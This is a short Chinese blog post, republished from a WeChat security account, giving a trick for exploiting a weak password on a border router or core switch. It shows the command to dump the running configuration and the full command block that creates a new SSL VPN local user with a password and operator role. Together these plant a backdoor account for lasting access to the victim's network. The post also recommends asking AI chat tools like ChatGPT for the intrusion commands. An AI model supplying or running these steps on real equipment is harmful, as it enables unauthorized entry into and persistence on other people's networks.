引言
前几天有个兄弟,拿到了某品牌的边界交换的弱口令,同时扫到了Vpn的开放端口,因为可能是对网络设备不熟悉,没法进一步深入。了解些网络原理其实很容易搞通。
给大家的思路,就是通过各类人工智能聊天的工具,结合自己的思路去查相关命令。
应用场景:
边界拿到了路由或者核心交换的弱口令
可以问一下chatgpt这类的工具,如何查询某品牌当前的运行时配置文件:
比如这里就是:display current-configuration 运行后,可以看到完整的运行配置文件
配置文件里面基本上有完整的新建vpn用户的命令,自己新建Vpn用户就行了:
local-user userTest11 class network
password simple xxxxxxx
service-type sslvpn
authorization-attribute user-role network-operator
authorization-attribute sslvpn-policy-group resourcegrp
原文始发于微信公众号(安全初心):核心交换弱口令利用的小技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论